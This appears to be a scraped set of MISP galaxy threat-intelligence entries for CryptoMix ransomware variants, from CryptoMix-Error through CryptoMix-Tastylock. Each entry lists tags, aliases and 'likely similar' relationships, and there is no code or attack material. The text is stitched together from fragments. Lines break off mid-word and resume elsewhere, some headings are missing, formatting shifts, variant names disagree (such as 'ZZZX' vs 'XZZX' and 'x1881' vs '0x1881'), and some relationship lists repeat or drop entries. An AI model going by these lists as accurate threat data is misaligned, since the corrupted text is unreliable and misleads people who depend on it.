• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-ZZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"
CryptoMix-Error

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Error"

CryptoMix-Error has relationships with:

- similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

**CryptoMix-Exte**

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Exte"

CryptoMix-Exte has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"
Cryptomix-FILE

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-FILE"

Cryptomix-FILE has relationships with:

- similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
The tag is: `misp-galaxy:ransomware="CryptoMix-MOLE66"`

CryptoMix-MOLE66 has relationships with:

- similar: `misp-galaxy:ransomware="CryptoMix"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-0000"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Arena"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Azer"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Backup"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-CK"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Coban"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-DLL"` with estimative-language:likelihood-probability="likely"
probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"
CryptoMix-Noob

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Noob"

CryptoMix-Noob has relationships with:

- similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

**CryptoMix-Ogonia**

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoMix-Ogonia"*

CryptoMix-Ogonia has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"
CryptoMix-Pirate

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Pirate"

CryptoMix-Pirate has relationships with:

- similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Revenge

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Revenge"

CryptoMix-Revenge has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"
Cryptomix-SERVER

Ransomware

The tag is: `misp-galaxy:ransomware="Cryptomix-SERVER"`

Cryptomix-SERVER is also known as:

- SERVER Cryptomix

Cryptomix-SERVER has relationships with:

- similar: `misp-galaxy:ransomware="CryptoMix"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-0000"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Arena"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Azer"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Backup"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-CK"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Coban"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-DLL"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Empty"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Error"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Exte"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-FILE"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-MOLE66"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Noob"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Ogonia"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Pirate"` with `estimative-language:likelihood-probability="likely"`
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-0x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

### CryptoMix-Shark

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoMix-Shark"

CryptoMix-Shark is also known as:

- Shark CryptoMix

CryptoMix-Shark has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
CryptoMix-System

Ransomware

The tag is: *misp-galaxy:ransomware=“CryptoMix-System”*

CryptoMix-System is also known as:

- System CryptoMix

CryptoMix-System has relationships with:

- similar: *misp-galaxy:ransomware=“CryptoMix”* with estimative-language:likelihood-probability=“likely”
- similar: *misp-galaxy:ransomware=“CryptoMix-0000”* with estimative-language:likelihood-probability=“likely”
- similar: *misp-galaxy:ransomware=“CryptoMix-Backup”* with estimative-language:likelihood-probability=“likely”
- similar: *misp-galaxy:ransomware=“CryptoMix-Coban”* with estimative-language:likelihood-probability=“likely”
- similar: *misp-galaxy:ransomware=“CryptoMix-DLL”* with estimative-language:likelihood-probability=“likely”
- similar: *misp-galaxy:ransomware=“Cryptomix-FILE”* with estimative-language:likelihood-probability=“likely”
probability="likely"

- similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

**CryptoMix-Tastylock**

Ransomware

The tag is: `misp-galaxy:ransomware="CryptoMix-Tastylock"`

CryptoMix-Tastylock is also known as:

- Tastylock CryptoMix

CryptoMix-Tastylock has relationships with:

- similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-
• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
